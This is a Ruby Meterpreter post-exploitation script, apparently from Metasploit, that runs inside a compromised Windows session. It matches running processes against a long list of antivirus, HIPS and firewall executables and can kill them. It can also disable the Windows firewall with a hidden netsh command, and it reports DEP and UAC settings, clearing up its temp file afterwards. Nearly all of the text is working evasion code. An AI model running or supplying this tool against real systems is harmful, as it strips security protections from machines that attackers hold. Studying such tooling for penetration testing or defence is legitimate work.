## # WARNING: Metasploit no longer maintains or accepts meterpreter scripts. # If you'd like to imporve this script, please try to port it as a post # module instead. Thank you. ## # # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. # Provides also the option to kill the processes of detected products and disable the built-in firewall. # Provided by Carlos Perez at carlos_perez[at]darkoperator.com # Version: 0.1.0 session = client @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ], "-d" => [ false, "Disable built in Firewall" ] ) def usage print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV") print_line("processes, show XP firewall rules, and display DEP and UAC") print_line("policies") print(@@exec_opts.usage) raise Rex::Script::Completed end #------------------------------------------------------------------------------- avs = %W{ a2adguard.exe a2adwizard.exe a2antidialer.exe a2cfg.exe a2cmd.exe a2free.exe a2guard.exe a2hijackfree.exe a2scan.exe a2service.exe a2start.exe a2sys.exe a2upd.exe aavgapi.exe aawservice.exe aawtray.exe ad-aware.exe ad-watch.exe alescan.exe anvir.exe ashdisp.exe ashmaisv.exe ashserv.exe ashwebsv.exe aswupdsv.exe atrack.exe avgagent.exe avgamsvr.exe avgcc.exe avgctrl.exe avgemc.exe avgnt.exe avgtcpsv.exe avguard.exe avgupsvc.exe avgw.exe avkbar.exe avk.exe avkpop.exe avkproxy.exe avkservice.exe avktray avktray.exe avkwctl avkwctl.exe avmailc.exe avp.exe avpm.exe avpmwrap.exe avsched32.exe avwebgrd.exe avwin.exe avwupsrv.exe avz.exe bdagent.exe bdmcon.exe bdnagent.exe bdss.exe bdswitch.exe blackd.exe blackice.exe blink.exe boc412.exe boc425.exe bocore.exe bootwarn.exe cavrid.exe cavtray.exe ccapp.exe ccevtmgr.exe ccimscan.exe ccproxy.exe ccpwdsvc.exe ccpxysvc.exe ccsetmgr.exe cfgwiz.exe cfp.exe clamd.exe clamservice.exe clamtray.exe cmdagent.exe cpd.exe cpf.exe csinsmnt.exe dcsuserprot.exe defensewall.exe defensewall_serv.exe defwatch.exe f-agnt95.exe fpavupdm.exe f-prot95.exe f-prot.exe fprot.exe fsaua.exe fsav32.exe f-sched.exe fsdfwd.exe fsm32.exe fsma32.exe fssm32.exe f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe iamstats.exe iao.exe icload95.exe icmon.exe idsinst.exe idslu.exe inetupd.exe irsetup.exe isafe.exe isignup.exe issvc.exe kav.exe kavss.exe kavsvc.exe klswd.exe kpf4gui.exe kpf4ss.exe livesrv.exe lpfw.exe mcagent.exe mcdetect.exe mcmnhdlr.exe mcrdsvc.exe mcshield.exe mctskshd.exe mcvsshld.exe mghtml.exe mpftray.exe msascui.exe mscifapp.exe msfwsvc.exe msgsys.exe msssrv.exe navapsvc.exe navapw32.exe navlogon.dll navstub.exe navw32.exe nisemsvr.exe nisum.exe nmain.exe noads.exe nod32krn.exe nod32kui.exe nod32ra.exe npfmntor.exe nprotect.exe nsmdtr.exe oasclnt.exe ofcdog.exe opscan.exe ossec-agent.exe outpost.exe paamsrv.exe pavfnsvr.exe pcclient.exe pccpfw.exe pccwin98.exe persfw.exe protector.exe qconsole.exe qdcsfs.exe rtvscan.exe sadblock.exe safe.exe sandboxieserver.exe savscan.exe sbiectrl.exe sbiesvc.exe sbserv.exe scfservice.exe sched.exe schedm.exe scheduler daemon.exe sdhelp.exe serv95.exe sgbhp.exe sgmain.exe slee503.exe smartfix.exe smc.exe snoopfreesvc.exe snoopfreeui.exe spbbcsvc.exe sp_rsser.exe spyblocker.exe spybotsd.exe spysweeper.exe spysweeperui.exe spywareguard.dll spywareterminatorshield.exe ssu.exe steganos5.exe stinger.exe swdoctor.exe swupdate.exe symlcsvc.exe symundo.exe symwsc.exe symwscno.exe tcguard.exe tds2-98.exe tds-3.exe teatimer.exe tgbbob.exe tgbstarter.exe tsatudt.exe umxagent.exe umxcfg.exe umxfwhlp.exe umxlu.exe umxpol.exe umxtray.exe usrprmpt.exe vetmsg9x.exe vetmsg.exe vptray.exe vsaccess.exe vsserv.exe wcantispy.exe win-bugsfix.exe winpatrol.exe winpatrolex.exe wrsssdk.exe xcommsvr.exe xfr.exe xp-antispy.exe zegarynka.exe zlclient.exe } #------------------------------------------------------------------------------- # Check for the presence of AV, HIPS and Third Party firewall and/or kill the # processes associated with it def check(session,avs,killbit) print_status("Checking for contermeasures...") session.sys.process.get_processes().each do |x| if (avs.index(x['name'].downcase)) print_status("\tPossible countermeasure found #{x['name']} #{x['path']}") if (killbit) print_status("\tKilling process for countermeasure.....") session.sys.process.kill(x['pid']) end end end end #------------------------------------------------------------------------------- # Get the configuration and/or disable the built in Windows Firewall def checklocalfw(session,killfw) print_status("Getting Windows Built in Firewall configuration...") opmode = "" r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true}) while(d = r.channel.read) opmode << d end r.channel.close r.close opmode.split("\n").each do |o| print_status("\t#{o}") end if (killfw) print_status("Disabling Built in Firewall.....") f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true}) while(d = f.channel.read) if d =~ /The requested operation requires elevation./ print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall") end end f.channel.close f.close end end #------------------------------------------------------------------------------- # Function for getting the current DEP Policy on the Windows Target def checkdep(session) tmpout = "" depmode = "" # Expand environment %TEMP% variable tmp = session.sys.config.getenv('TEMP') # Create random name for the wmic output wmicfile = sprintf("%.5d",rand(100000)) wmicout = "#{tmp}\\#{wmicfile}" print_status("Checking DEP Support Policy...") r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true}) sleep(2) r.close r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) tmpout << d end r.channel.close r.close session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true}) depmode = tmpout.scan(/(\d)/) if depmode.to_s == "0" print_status("\tDEP is off for the whole system.") elsif depmode.to_s == "1" print_status("\tFull DEP coverage for the whole system with no exceptions.") elsif depmode.to_s == "2" print_status("\tDEP is limited to Windows system binaries.") elsif depmode.to_s == "3" print_status("\tDEP is on for all programs and services.") end end #------------------------------------------------------------------------------- def checkuac(session) print_status("Checking if UAC is enabled ...") key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' root_key, base_key = session.sys.registry.splitkey(key) value = "EnableLUA" open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) v = open_key.query_value(value) if v.data == 1 print_status("\tUAC is Enabled") else print_status("\tUAC is Disabled") end end ################## MAIN ################## killbt = false killfw = false @@exec_opts.parse(args) { |opt, idx, val| case opt when "-k" killbt = true when "-d" killfw = true when "-h" usage end } # get the version of windows if client.platform =~ /win32|win64/ wnvr = session.sys.config.sysinfo["OS"] print_status("Running Getcountermeasure on the target...") check(session,avs,killbt) if wnvr !~ /Windows 2000/ checklocalfw(session, killfw) checkdep(session) end if wnvr =~ /Windows Vista/ checkuac(session) end else print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end